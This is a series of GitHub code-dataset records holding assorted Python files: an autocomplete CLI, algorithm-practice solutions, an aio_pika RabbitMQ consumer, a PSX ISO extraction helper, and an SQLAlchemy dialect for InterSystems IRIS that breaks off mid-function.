range(len(searching_words)):\n if dict.words_dict.get(searching_words[i]):\n trie = dict.words_dict[searching_words[i]]\n if i == len(searching_words) - 1:\n break\n temp = trie.search(searching_words[i + 1])\n if i == 0:\n all_possible_src = temp\n else:\n all_possible_src = intersection(temp, all_possible_src)\n return [AutoCompleteData(searching['word'], i, case, searching['index']) for i in all_possible_src]\n\n\ndef cli():\n dict = StoreData()\n open_file('mini-data')\n while True:\n searching = input('search in google or enter webSite Address:\\n')\n auto_complete_data_arr = get_res_of_search(dict, {'word': searching, 'index': -1}, 'not_changed')\n for i in range(min(len(auto_complete_data_arr), 5)):\n print(auto_complete_data_arr[i])\n if len(auto_complete_data_arr) < 5:\n changed_and_deleted_arr = list()\n changed_arr = completed_sentence_change_one_char(searching)\n deleted_arr = 
completed_sentence_delete_one_char(searching)\n add_data = completed_sentence_add_one_char(searching)\n for i in range(len(changed_arr)):\n changed_and_deleted_arr += get_res_of_search(dict, changed_arr[i], 'changed')\n for i in range(len(deleted_arr)):\n changed_and_deleted_arr += get_res_of_search(dict, deleted_arr[i], 'delete_one')\n for i in range(len(add_data)):\n changed_and_deleted_arr += get_res_of_search(dict, add_data[i], 'add_one')\n hiest_score_arr = [AutoCompleteData('', (0, ''), '', -1, False)] * 5\n max_score = 0\n for i in range(len(changed_and_deleted_arr)):\n if changed_and_deleted_arr[i].score >= max_score:\n max_score = changed_and_deleted_arr[i].score\n hiest_score_arr = [changed_and_deleted_arr[i]] + hiest_score_arr\n hiest_score_arr.pop()\n for i in range(min(5 - len(auto_complete_data_arr), len(hiest_score_arr))):\n if hiest_score_arr[i].is_real:\n print(hiest_score_arr[i])\n if len(changed_and_deleted_arr) == 0:\n print('not suitable data')\n\n\nif __name__ == '__main__':\n cli()\n","repo_name":"RacheliBlass512/auto-complete","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4031,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"5732477459","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\ntest_case = int(input())\r\n\r\ndp = [0 for _ in range(101)]\r\ndp[1] = dp[2] = dp[3] = 1\r\ndp[4] = dp[5] = 2\r\n\r\nfor i in range(6, len(dp)):\r\n dp[i] = dp[i-5] + dp[i-1]\r\n\r\nfor _ in range(test_case):\r\n N = int(input())\r\n print(dp[N])","repo_name":"BangDori/python-algorithm","sub_path":"백준/Silver/9461. 파도반 수열/파도반 수열.py","file_name":"파도반 수열.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5888782507","text":"\"\"\"A RabbitMQ consumer\"\"\"\n\nimport asyncio\nfrom asyncio import Event\nimport json\nimport signal\nfrom typing import AsyncIterator, TypeVar\n\nimport aio_pika\n\nT = TypeVar('T')\n\n\nasync def cancellable_aiter(\n async_iterator: AsyncIterator[T],\n cancellation_event: Event\n) -> AsyncIterator[T]:\n \"\"\"Wrap an async iterator such that it exits when the cancellation event is\n set.\n \"\"\"\n cancellation_task = asyncio.create_task(cancellation_event.wait())\n result_iter = async_iterator.__aiter__()\n while not cancellation_event.is_set():\n done, pending = await asyncio.wait(\n [cancellation_task, result_iter.__anext__()],\n return_when=asyncio.FIRST_COMPLETED\n )\n for done_task in done:\n if done_task != cancellation_task:\n # We have a result from the async iterator.\n yield done_task.result()\n else:\n # The cancellation token has been set, and we should exit.\n # Cancel any pending tasks. This is safe as there is no await\n # between the completion of the wait on the cancellation event\n # and the pending tasks being cancelled. 
This means that the\n # pending tasks cannot have done any work.\n for pending_task in pending:\n pending_task.cancel()\n # Now that the tasks are cancelled, we can await the cancellation\n # error, knowing they have done no work.\n for pending_task in pending:\n try:\n await pending_task\n except asyncio.CancelledError:\n pass\n\n\nasync def main_async():\n print(\"Press CTRL-C to quit\")\n cancellation_event = Event()\n\n def _signal_handler(*args, **kwargs):\n print('Setting the cancellation event')\n cancellation_event.set()\n\n loop = asyncio.get_event_loop()\n for signal_value in {signal.SIGINT, signal.SIGTERM}:\n loop.add_signal_handler(signal_value, _signal_handler)\n\n url = \"amqp://guest:guest@127.0.0.1/\"\n async with await aio_pika.connect(url) as connection:\n\n channel = await connection.channel()\n queue = await channel.declare_queue('producer', passive=True)\n\n async with queue.iterator() as queue_iter:\n async for message in cancellable_aiter(queue_iter, cancellation_event):\n async with message.process():\n obj = json.loads(message.body.decode())\n print(obj)\n\nif __name__ == '__main__':\n asyncio.run(main_async())\n","repo_name":"rob-blackbourn/example-aio-pkia-cancellation-1","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"3278142804","text":"import utils\nimport torch\n\nimport IPython\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nx = torch.tensor([[1, 5, 6, 4, 3, 9, 5, 2, 0], [1, 8, 7, 3, 4, 5, 6, 7, 2]]).to(device)\ntrg = torch.tensor([[1, 7, 3, 2, 4, 9, 1, 0], [1, 5, 6, 2, 4, 7, 6, 2]]).to(device)\n\nsrc_pad_idx = 0\ntrg_pad_idx = 0\nsrc_vocab_size = 10\ntrg_vocab_size = 10\nmodel = utils.Transformer(src_vocab_size, trg_vocab_size, src_pad_idx, trg_pad_idx).to(\n device\n)\nout = model(x, trg[:, :-1])\n","repo_name":"michaelliangau/ai","sub_path":"projects/pytorch_transformer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17260655202","text":"# BOJ 1016: square-free numbers (제곱 ㄴㄴ 수)\nimport math\n\na, b = map(int, input().split())\n\nsieve = [1 for i in range(a, b+1)]\n\nfor i in range(2, int(b**0.5)+1):\n squares = i**2\n temp = (math.ceil(a/squares) * squares) - a\n while temp <= b-a :\n sieve[temp] = 0\n temp += squares\n\nresult = sum(sieve)\nprint(result)","repo_name":"Gwanghun-Im/BAEKJOON","sub_path":"210212/1016.py","file_name":"1016.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39225271850","text":"# For loops in python\r\n\r\nlist1 = [\"Spiderman\", \"Peter parker\", \"Keerat\", \"Joker\"] # Creating list\r\nfor item in list1:\r\n print(f\"My name is {item}.\")\r\n\r\ndic1 = {\r\n \"Harry\": 1, \"Keerat\": 2\r\n}\r\nfor key, value in dic1.items():\r\n print(f\"{key} has {value} phone.\")\r\n\r\n# Quiz\r\nlist2 = [\"a\", 11, 2, 3, 4, 12, 23, 134, \"joker\"]\r\nfor i in list2:\r\n if str(i).isnumeric() and i > 6:\r\n print(i)\r\n else:\r\n print(\"No match\")\r\n","repo_name":"KeertanSingh/PYTHON-PRATICE","sub_path":"learning/forLoops.py","file_name":"forLoops.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75045303204","text":"#! 
python3\n# coding: utf-8\n\nimport os, os.path\nimport shutil\n\nEXT_TOOL = 'tools/isodump.exe'\nMOD_TOOL = 'tools/psx-mode2-en.exe'\n\nEXT_CMD = '{:s} \"{:s}\" -x \"{:s}\"'\nMOD_CMD = '{:s} \"{:s}\" \\\\{:s} \"{:s}\"'\n\nEXT_TOOL = os.path.abspath(EXT_TOOL)\nMOD_TOOL = os.path.abspath(MOD_TOOL)\n\nclass c_iso_extractor:\n\n def __init__(self, src_fname, ext_path = r'table\\ext', mod_path = None):\n self.src_fname = os.path.abspath(src_fname)\n if not os.path.exists(self.src_fname):\n raise ValueError('src file does not exist')\n self.ext_path = os.path.abspath(ext_path)\n if not os.path.exists(self.ext_path):\n os.makedirs(self.ext_path)\n if not mod_path:\n mod_path = ext_path\n self.mod_path = os.path.abspath(mod_path)\n if not os.path.exists(self.mod_path):\n os.makedirs(self.mod_path)\n\n def get_path(self, typ, fname = ''):\n if typ == 'ext':\n path = self.ext_path\n elif typ == 'mod':\n path = self.mod_path\n return os.path.join(path, fname)\n\n def extract(self, tarlist = []):\n for tar in tarlist:\n p = self.get_path('ext', tar)\n if not os.path.exists(p):\n break\n else:\n if len(tarlist) > 0:\n return True\n cmd = EXT_CMD.format(EXT_TOOL, self.src_fname, self.ext_path)\n if os.system(cmd) == 0:\n return True\n else:\n return False\n\n def modify(self, out_fn):\n shutil.copy(self.src_fname, out_fn)\n for fn in os.listdir(self.mod_path):\n cmd = MOD_CMD.format(MOD_TOOL,\n out_fn, fn,\n os.path.join(self.mod_path, fn))\n if os.system(cmd) != 0:\n return False\n return True\n \nif __name__ == '__main__':\n\n iso_file = r'G:\\emu\\ps\\roms\\Tail Concerto (Japan).bin'\n \n extr = c_iso_extractor(iso_file)\n","repo_name":"BSoD123456/psx_modi_for_tc","sub_path":"iso_extractor.py","file_name":"iso_extractor.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"43554565918","text":"import datetime\nfrom sqlalchemy.types import BINARY\nfrom . 
import information_schema as ischema\nfrom sqlalchemy import exc\nfrom sqlalchemy.orm import aliased\nfrom sqlalchemy.engine import default\nfrom sqlalchemy.engine import reflection\nfrom sqlalchemy.sql import compiler\nfrom sqlalchemy.sql import util as sql_util\nfrom sqlalchemy.sql import between\nfrom sqlalchemy.sql import func\nfrom sqlalchemy import sql\nfrom sqlalchemy import util\nfrom sqlalchemy import types as sqltypes\n\nfrom sqlalchemy.types import BIGINT\nfrom sqlalchemy.types import VARCHAR\nfrom sqlalchemy.types import INTEGER\nfrom sqlalchemy.types import BOOLEAN\nfrom sqlalchemy.types import DATE\nfrom sqlalchemy.types import TIMESTAMP\nfrom sqlalchemy.types import TIME\nfrom sqlalchemy.types import NUMERIC\nfrom sqlalchemy.types import FLOAT\nfrom sqlalchemy.types import VARBINARY\nfrom sqlalchemy.types import TEXT\nfrom sqlalchemy.types import SMALLINT\n\nischema_names = {\n \"BIGINT\": BIGINT,\n \"VARCHAR\": VARCHAR,\n \"INTEGER\": INTEGER,\n \"BIT\": BOOLEAN,\n \"DATE\": DATE,\n \"TIMESTAMP\": TIMESTAMP,\n \"NUMERIC\": NUMERIC,\n \"DOUBLE\": FLOAT,\n \"VARBINARY\": BINARY,\n \"LONGVARCHAR\": TEXT,\n \"LONGVARBINARY\": VARBINARY,\n \"TIME\": TIME,\n \"SMALLINT\": SMALLINT,\n \"TINYINT\": SMALLINT,\n}\n\nRESERVED_WORDS = set(\n [\n \"%AFTERHAVING\",\n \"%ALLINDEX\",\n \"%ALPHAUP\",\n \"%ALTER\",\n \"%BEGTRANS\",\n \"%CHECKPRIV\",\n \"%CLASSNAME\",\n \"%CLASSPARAMETER\",\n \"%DBUGFULL\",\n \"%DELDATA\",\n \"%DESCRIPTION\",\n \"%EXACT\",\n \"%EXTERNAL\",\n \"%FILE\",\n \"%FIRSTTABLE\",\n \"%FLATTEN\",\n \"%FOREACH\",\n \"%FULL\",\n \"%ID\",\n \"%IDADDED\",\n \"%IGNOREINDEX\",\n \"%IGNOREINDICES\",\n \"%INLIST\",\n \"%INORDER\",\n \"%INTERNAL\",\n \"%INTEXT\",\n \"%INTRANS\",\n \"%INTRANSACTION\",\n \"%KEY\",\n \"%MATCHES\",\n \"%MCODE\",\n \"%MERGE\",\n \"%MINUS\",\n \"%MVR\",\n \"%NOCHECK\",\n \"%NODELDATA\",\n \"%NOFLATTEN\",\n \"%NOFPLAN\",\n \"%NOINDEX\",\n \"%NOLOCK\",\n \"%NOMERGE\",\n \"%NOPARALLEL\",\n \"%NOREDUCE\",\n \"%NORUNTIME\",\n \"%NOSVSO\",\n \"%NOTOPOPT\",\n \"%NOTRIGGER\",\n \"%NOUNIONOROPT\",\n \"%NUMROWS\",\n \"%ODBCIN\",\n \"%ODBCOUT\",\n \"%PARALLEL\",\n \"%PLUS\",\n \"%PROFILE\",\n \"%PROFILE_ALL\",\n \"%PUBLICROWID\",\n \"%ROUTINE\",\n \"%ROWCOUNT\",\n \"%RUNTIMEIN\",\n \"%RUNTIMEOUT\",\n \"%STARTSWITH\",\n \"%STARTTABLE\",\n \"%SQLSTRING\",\n \"%SQLUPPER\",\n \"%STRING\",\n \"%TABLENAME\",\n \"%TRUNCATE\",\n \"%UPPER\",\n \"%VALUE\",\n \"%VID\",\n \"ABSOLUTE\",\n \"ADD\",\n \"ALL\",\n \"ALLOCATE\",\n \"ALTER\",\n \"AND\",\n \"ANY\",\n \"ARE\",\n \"AS\",\n \"ASC\",\n \"ASSERTION\",\n \"AT\",\n \"AUTHORIZATION\",\n \"AVG\",\n \"BEGIN\",\n \"BETWEEN\",\n \"BIT\",\n \"BIT_LENGTH\",\n \"BOTH\",\n \"BY\",\n \"CASCADE\",\n \"CASE\",\n \"CAST |\",\n \"CHAR\",\n \"CHARACTER\",\n \"CHARACTER_LENGTH\",\n \"CHAR_LENGTH\",\n \"CHECK\",\n \"CLOSE\",\n \"COALESCE\",\n \"COLLATE\",\n \"COMMIT\",\n \"CONNECT\",\n \"CONNECTION\",\n \"CONSTRAINT\",\n \"CONSTRAINTS\",\n \"CONTINUE\",\n \"CONVERT\",\n \"CORRESPONDING\",\n \"COUNT\",\n \"CREATE\",\n \"CROSS\",\n \"CURRENT\",\n \"CURRENT_DATE\",\n \"CURRENT_TIME\",\n \"CURRENT_TIMESTAMP\",\n \"CURRENT_USER\",\n \"CURSOR\",\n \"DATE\",\n \"DEALLOCATE\",\n \"DEC\",\n \"DECIMAL\",\n \"DECLARE\",\n \"DEFAULT\",\n \"DEFERRABLE\",\n \"DEFERRED\",\n \"DELETE\",\n \"DESC\",\n \"DESCRIBE\",\n \"DESCRIPTOR\",\n \"DIAGNOSTICS\",\n \"DISCONNECT\",\n \"DISTINCT\",\n \"DOMAIN\",\n \"DOUBLE\",\n \"DROP\",\n \"ELSE\",\n \"END\",\n \"ENDEXEC\",\n \"ESCAPE\",\n \"EXCEPT\",\n \"EXCEPTION\",\n \"EXEC\",\n \"EXECUTE\",\n \"EXISTS\",\n 
\"EXTERNAL\",\n \"EXTRACT\",\n \"FALSE\",\n \"FETCH\",\n \"FIRST\",\n \"FLOAT\",\n \"FOR\",\n \"FOREIGN\",\n \"FOUND\",\n \"FROM\",\n \"FULL\",\n \"GET\",\n \"GLOBAL\",\n \"GO\",\n \"GOTO\",\n \"GRANT\",\n \"GROUP\",\n \"HAVING\",\n \"HOUR\",\n \"IDENTITY\",\n \"IMMEDIATE\",\n \"IN\",\n \"INDICATOR\",\n \"INITIALLY\",\n \"INNER\",\n \"INPUT\",\n \"INSENSITIVE\",\n \"INSERT\",\n \"INT\",\n \"INTEGER\",\n \"INTERSECT\",\n \"INTERVAL\",\n \"INTO\",\n \"IS\",\n \"ISOLATION\",\n \"JOIN\",\n \"LANGUAGE\",\n \"LAST\",\n \"LEADING\",\n \"LEFT\",\n \"LEVEL\",\n \"LIKE\",\n \"LOCAL\",\n \"LOWER\",\n \"MATCH\",\n \"MAX\",\n \"MIN\",\n \"MINUTE\",\n \"MODULE\",\n \"NAMES\",\n \"NATIONAL\",\n \"NATURAL\",\n \"NCHAR\",\n \"NEXT\",\n \"NO\",\n \"NOT\",\n \"NULL\",\n \"NULLIF\",\n \"NUMERIC\",\n \"OCTET_LENGTH\",\n \"OF\",\n \"ON\",\n \"ONLY\",\n \"OPEN\",\n \"OPTION\",\n \"OR\",\n \"OUTER\",\n \"OUTPUT\",\n \"OVERLAPS\",\n \"PAD\",\n \"PARTIAL\",\n \"PREPARE\",\n \"PRESERVE\",\n \"PRIMARY\",\n \"PRIOR\",\n \"PRIVILEGES\",\n \"PROCEDURE\",\n \"PUBLIC\",\n \"READ\",\n \"REAL\",\n \"REFERENCES\",\n \"RELATIVE\",\n \"RESTRICT\",\n \"REVOKE\",\n \"RIGHT\",\n \"ROLE\",\n \"ROLLBACK\",\n \"ROWS\",\n \"SCHEMA\",\n \"SCROLL\",\n \"SECOND\",\n \"SECTION\",\n \"SELECT\",\n \"SESSION_USER\",\n \"SET\",\n \"SHARD\",\n \"SMALLINT\",\n \"SOME\",\n \"SPACE\",\n \"SQLERROR\",\n \"SQLSTATE\",\n \"STATISTICS\",\n \"SUBSTRING\",\n \"SUM\",\n \"SYSDATE\",\n \"SYSTEM_USER\",\n \"TABLE\",\n \"TEMPORARY\",\n \"THEN\",\n \"TIME\",\n \"TIMEZONE_HOUR\",\n \"TIMEZONE_MINUTE\",\n \"TO\",\n \"TOP\",\n \"TRAILING\",\n \"TRANSACTION\",\n \"TRIM\",\n \"TRUE\",\n \"UNION\",\n \"UNIQUE\",\n \"UPDATE\",\n \"UPPER\",\n \"USER\",\n \"USING\",\n \"VALUES\",\n \"VARCHAR\",\n \"VARYING\",\n \"WHEN\",\n \"WHENEVER\",\n \"WHERE\",\n \"WITH\",\n \"WORK\",\n \"WRITE\",\n ]\n)\n\n\nclass IRISCompiler(sql.compiler.SQLCompiler):\n \"\"\"IRIS specific idiosyncrasies\"\"\"\n\n def limit_clause(self, select, **kw):\n return \"\"\n\n def fetch_clause(self, select, **kw):\n return \"\"\n\n def visit_empty_set_expr(self, type_):\n return \"SELECT 1 WHERE 1!=1\"\n\n def _get_limit_or_fetch(self, select):\n if select._fetch_clause is None:\n return select._limit_clause\n else:\n return select._fetch_clause\n\n def get_select_precolumns(self, select, **kw):\n\n text = \"\"\n if select._has_row_limiting_clause and self._use_top(select):\n text += \"TOP %s \" % self.process(\n self._get_limit_or_fetch(select), **kw\n )\n\n if select._distinct or select._distinct_on:\n if select._distinct_on:\n text += (\n \"DISTINCT ON (\"\n + \", \".join(\n [\n self.process(col, **kw)\n for col in select._distinct_on\n ]\n )\n + \") \"\n )\n else:\n text += \"DISTINCT \"\n\n return text\n\n def _use_top(self, select):\n return (select._offset_clause is None) and (\n select._simple_int_clause(select._limit_clause)\n or select._simple_int_clause(select._fetch_clause)\n )\n\n def translate_select_structure(self, select_stmt, **kwargs):\n \"\"\"Look for ``LIMIT`` and OFFSET in a select statement, and if\n so tries to wrap it in a subquery with ``row_number()`` criterion.\n\n \"\"\"\n select = select_stmt\n\n if (\n select._has_row_limiting_clause\n and not self._use_top(select)\n and not getattr(select, \"_iris_visit\", None)\n ):\n _order_by_clauses = [\n sql_util.unwrap_label_reference(elem)\n for elem in select._order_by_clause.clauses\n ]\n\n limit_clause = self._get_limit_or_fetch(select)\n offset_clause = select._offset_clause\n\n select = select._generate()\n 
select._iris_visit = True\n label = \"iris_rn\"\n select = (\n select.add_columns(\n sql.func.ROW_NUMBER()\n .over(order_by=_order_by_clauses)\n .label(label)\n )\n .order_by(None)\n .alias()\n )\n\n iris_rn = sql.column(label)\n limitselect = sql.select(\n *[c for c in select.c if c.key != label]\n )\n if offset_clause is not None:\n if limit_clause is not None:\n limitselect = limitselect.where(\n between(iris_rn, offset_clause + 1,\n limit_clause + offset_clause)\n )\n else:\n limitselect = limitselect.where(iris_rn > offset_clause)\n else:\n limitselect = limitselect.where(iris_rn <= (limit_clause))\n return limitselect\n else:\n return select\n\n\nclass IRISDDLCompiler(sql.compiler.DDLCompiler):\n \"\"\"IRIS syntactic idiosyncrasies\"\"\"\n\n def visit_create_schema(self, create, **kw):\n return \"\"\n\n def visit_drop_schema(self, drop, **kw):\n return \"\"\n\n def visit_check_constraint(self, constraint, **kw):\n raise exc.CompileError(\"Check CONSTRAINT not supported\")\n\n\nclass IRISTypeCompiler(compiler.GenericTypeCompiler):\n def visit_boolean(self, type_, **kw):\n return \"BIT\"\n\n\nclass IRISIdentifierPreparer(sql.compiler.IdentifierPreparer):\n \"\"\"Install IRIS specific reserved words.\"\"\"\n\n reserved_words = compiler.RESERVED_WORDS.copy()\n reserved_words.update(RESERVED_WORDS)\n illegal_initial_characters = compiler.ILLEGAL_INITIAL_CHARACTERS.union(\n [\"_\"]\n )\n\n def __init__(self, dialect):\n super(IRISIdentifierPreparer, self).__init__(\n dialect, omit_schema=False)\n\n\nclass IRISExecutionContext(default.DefaultExecutionContext):\n pass\n\n\nHOROLOG_ORDINAL = datetime.date(1840, 12, 31).toordinal()\n\n\nclass _IRISDate(sqltypes.Date):\n def bind_processor(self, dialect):\n def process(value):\n if value is None:\n return None\n horolog = value.toordinal() - HOROLOG_ORDINAL\n return str(horolog)\n\n return process\n\n def result_processor(self, dialect, coltype):\n def process(value):\n if value is None:\n return None\n horolog = int(value) + HOROLOG_ORDINAL\n return datetime.date.fromordinal(horolog)\n\n return process\n\n\nclass _IRISDateTime(sqltypes.DateTime):\n def bind_processor(self, dialect):\n def process(value):\n if value is not None:\n return value.strftime('%Y-%m-%d %H:%M:%S')\n return value\n\n return process\n\n def result_processor(self, dialect, coltype):\n def process(value):\n if value is not None:\n return datetime.datetime.strptime(value, '%Y-%m-%d %H:%M:%S')\n return value\n\n return process\n\n\nclass _IRISTime(sqltypes.DateTime):\n def bind_processor(self, dialect):\n def process(value):\n if value is not None:\n return value.strftime('%H:%M:%S')\n return value\n\n return process\n\n def result_processor(self, dialect, coltype):\n def process(value):\n if value is not None:\n horolog = value\n hour = horolog // 3600\n horolog -= hour * 3600\n minute = horolog // 60\n second = horolog % 60\n return datetime.time(hour, minute, second)\n return value\n\n return process\n\n\ncolspecs = {\n sqltypes.Date: _IRISDate,\n sqltypes.DateTime: _IRISDateTime,\n sqltypes.Time: _IRISTime,\n}\n\n\nclass IRISDialect(default.DefaultDialect):\n driver = 'iris'\n\n default_schema_name = \"SQLUser\"\n\n default_paramstyle = \"format\"\n\n supports_native_decimal = True\n supports_sane_rowcount = True\n supports_sane_multi_rowcount = True\n supports_alter = True\n supports_schemas = True\n supports_views = True\n\n supports_sequences = False\n\n supports_statement_cache = False\n postfetch_lastrowid = False\n non_native_boolean_check_constraint = False\n 
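# Capability flags consumed by SQLAlchemy core; kept conservative for IRIS\n # (e.g. booleans are rendered as BIT, sequences are unsupported).\n 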
supports_simple_order_by_label = False\n supports_empty_insert = False\n supports_is_distinct_from = False\n\n colspecs = colspecs\n\n ischema_names = ischema_names\n\n statement_compiler = IRISCompiler\n ddl_compiler = IRISDDLCompiler\n preparer = IRISIdentifierPreparer\n type_compiler = IRISTypeCompiler\n execution_ctx_cls = IRISExecutionContext\n\n def __init__(self, **kwargs):\n default.DefaultDialect.__init__(self, **kwargs)\n\n @classmethod\n def dbapi(cls):\n import iris._IRISNative as irisnative\n import iris.dbapi._DBAPI as dbapi\n dbapi.connect = irisnative.connect\n dbapi.paramstyle = \"format\"\n return dbapi\n\n def create_connect_args(self, url):\n opts = {}\n opts[\"hostname\"] = url.host\n opts[\"port\"] = int(url.port) if url.port else 1972\n opts[\"namespace\"] = url.database if url.database else 'USER'\n opts[\"username\"] = url.username if url.username else ''\n opts[\"password\"] = url.password if url.password else ''\n\n return ([], opts)\n\n def _fix_for_params(self, query, params, many=False):\n if query.endswith(';'):\n query = query[:-1]\n if params is None:\n params = []\n elif hasattr(params, 'keys'):\n # Handle params as dict\n args = {k: \"?\" % k for k in params}\n query = query % args\n else:\n # Handle params as sequence\n args = ['?' for i in range(len(params if not many else params[0]))]\n query = query % tuple(args)\n newparams = list()\n for p in params:\n newparams.append(p if not many else list(p)\n if len(p) > 1 else p[0])\n return query, newparams\n\n def do_execute(self, cursor, query, params, context=None):\n query, params = self._fix_for_params(query, params)\n cursor.execute(query, params)\n\n def do_executemany(self, cursor, query, params, context=None):\n query, params = self._fix_for_params(query, params, True)\n cursor.executemany(query, params)\n\n def get_schema(self, schema=None):\n if schema is None:\n return 'SQLUser'\n return schema\n\n @reflection.cache\n def get_schema_names(self, connection, **kw):\n s = sql.select(ischema.schemata.c.schema_name).order_by(\n ischema.schemata.c.schema_name\n )\n schema_names = [r[0] for r in connection.execute(s)]\n return schema_names\n\n @reflection.cache\n def get_table_names(self, connection, schema=None, **kw):\n tables = ischema.tables\n schema_name = self.get_schema(schema)\n s = (\n sql.select(tables.c.table_name)\n .where(\n sql.and_(\n tables.c.table_schema == str(schema_name),\n tables.c.table_type == \"BASE TABLE\",\n )\n )\n .order_by(tables.c.table_name)\n )\n table_names = [r[0] for r in connection.execute(s)]\n return table_names\n\n @reflection.cache\n def has_table(self, connection, table_name, schema=None, **kw):\n self._ensure_has_table_connection(connection)\n tables = ischema.tables\n schema_name = self.get_schema(schema)\n\n s = (\n sql.select(func.count())\n .where(\n sql.and_(\n tables.c.table_schema == str(schema_name),\n tables.c.table_name == str(table_name),\n )\n )\n )\n return bool(connection.execute(s).scalar())\n\n @reflection.cache\n def get_indexes(self, connection, table_name, schema=None, unique=False, **kw):\n schema_name = self.get_schema(schema)\n indexes = ischema.indexes\n\n s = (\n sql.select(\n indexes.c.index_name,\n indexes.c.column_name,\n indexes.c.primary_key,\n indexes.c.non_unique,\n indexes.c.asc_or_desc,\n )\n .where(\n sql.and_(\n indexes.c.table_schema == str(schema_name),\n indexes.c.table_name == str(table_name),\n indexes.c.primary_key == sql.false(),\n (indexes.c.non_unique == sql.true()) if not unique else (1 == 1)\n )\n )\n 
.order_by(indexes.c.ordinal_position)\n )\n\n rs = connection.execute(s)\n\n indexes = util.defaultdict(dict)\n for row in rs:\n indexrec = indexes[row[\"INDEX_NAME\"]]\n if \"name\" not in indexrec:\n indexrec[\"name\"] = self.normalize_name(row[\"INDEX_NAME\"])\n indexrec[\"column_names\"] = []\n indexrec[\"unique\"] = not row[\"NON_UNIQUE\"]\n\n indexrec[\"column_names\"].append(\n self.normalize_name(row[\"COLUMN_NAME\"])\n )\n\n indexes = list(indexes.values())\n return indexes\n\n def get_pk_constraint(self, connection, table_name, schema=None, **kw):\n schema_name = self.get_schema(schema)\n key_constraints = ischema.key_constraints\n constraints = ischema.constraints\n\n s = (\n sql.select(\n key_constraints.c.constraint_name,\n key_constraints.c.column_name,\n )\n .join(constraints,\n sql.and_(\n key_constraints.c.constraint_name == constraints.c.constraint_name,\n key_constraints.c.table_schema == constraints.c.table_schema,\n )\n )\n .where(\n sql.and_(\n key_constraints.c.table_schema == str(schema_name),\n key_constraints.c.table_name == str(table_name),\n constraints.c.constraint_type == \"PRIMARY KEY\",\n )\n )\n .order_by(key_constraints.c.ordinal_position)\n )\n\n rs = connection.execute(s)\n\n constraint_name = None\n pkfields = []\n for row in rs:\n constraint_name = self.normalize_name(row[\"CONSTRAINT_NAME\"])\n pkfields.append(self.normalize_name(row[\"COLUMN_NAME\"]))\n\n if pkfields:\n return {\n \"constrained_columns\": pkfields,\n \"name\": constraint_name,\n }\n\n return None\n\n @reflection.cache\n def get_unique_constraints(self, connection, table_name, schema=None, **kw):\n indexes = self.get_indexes(\n connection, table_name, schema, unique=True, **kw)\n return [{'name': i['name'], 'column_names': i['column_names']}\n for i in indexes if i['unique']]\n\n @reflection.cache\n def get_foreign_keys(self, connection, table_name, schema=None, **kw):\n schema_name = self.get_schema(schema)\n ref_constraints = ischema.ref_constraints\n key_constraints = ischema.key_constraints\n key_constraints_ref = aliased(ischema.key_constraints)\n\n s = (\n sql.select(\n key_constraints.c.constraint_name,\n key_constraints.c.column_name,\n key_constraints_ref.c.table_schema,\n key_constraints_ref.c.table_name,\n key_constraints_ref.c.column_name,\n ref_constraints.c.match_option,\n ref_constraints.c.update_rule,\n ref_constraints.c.delete_rule,\n )\n .join(\n key_constraints,\n sql.and_(\n key_constraints.c.table_schema == ref_constraints.c.constraint_schema,\n key_constraints.c.constraint_name == ref_constraints.c.constraint_name,\n )\n )\n .join(\n key_constraints_ref,\n sql.and_(\n key_constraints_ref.c.constraint_schema == ref_constraints.c.unique_constraint_schema,\n key_constraints_ref.c.constraint_name == ref_constraints.c.unique_constraint_name,\n key_constraints_ref.c.ordinal_position == key_constraints.c.ordinal_position,\n )\n )\n .where(\n sql.and_(\n key_constraints.c.table_schema == str(schema_name),\n key_constraints.c.table_name == str(table_name),\n )\n )\n .order_by(key_constraints_ref.c.ordinal_position)\n )\n\n rs = connection.execute(s)\n\n fkeys = []\n\n def fkey_rec():\n return {\n \"name\": None,\n \"constrained_columns\": [],\n \"referred_schema\": None,\n \"referred_table\": None,\n \"referred_columns\": [],\n \"options\": {},\n }\n\n fkeys = util.defaultdict(fkey_rec)\n\n for row in rs:\n (\n rfknm,\n scol,\n rschema,\n rtbl,\n rcol,\n _, # match rule\n fkuprule,\n fkdelrule,\n ) = row\n\n rec = fkeys[rfknm]\n rec[\"name\"] = rfknm\n\n if fkuprule != 
\"NO ACTION\":\n rec[\"options\"][\"onupdate\"] = fkuprule\n\n if fkdelrule != \"NO ACTION\":\n rec[\"options\"][\"ondelete\"] = fkdelrule\n\n if not rec[\"referred_table\"]:\n rec[\"referred_table\"] = rtbl\n if rschema != 'SQLUser':\n rec[\"referred_schema\"] = rschema\n\n local_cols, remote_cols = (\n rec[\"constrained_columns\"],\n rec[\"referred_columns\"],\n )\n\n local_cols.append(scol)\n remote_cols.append(rcol)\n\n if fkeys:\n return list(fkeys.values())\n\n return []\n\n def get_columns(self, connection, table_name, schema=None, **kw):\n schema_name = self.get_schema(schema)\n columns = ischema.columns\n\n whereclause = sql.and_(\n columns.c.table_name == str(table_name),\n columns.c.table_schema == str(schema_name),\n )\n\n s = (\n sql.select(\n columns.c.column_name,\n columns.c.data_type,\n columns.c.is_nullable,\n columns.c.character_maximum_length,\n columns.c.numeric_precision,\n columns.c.numeric_scale,\n columns.c.column_default,\n columns.c.collation_name,\n columns.c.auto_increment,\n # columns.c.description,\n )\n .select_from(columns)\n .where(whereclause)\n .order_by(columns.c.ordinal_position)\n )\n\n c = 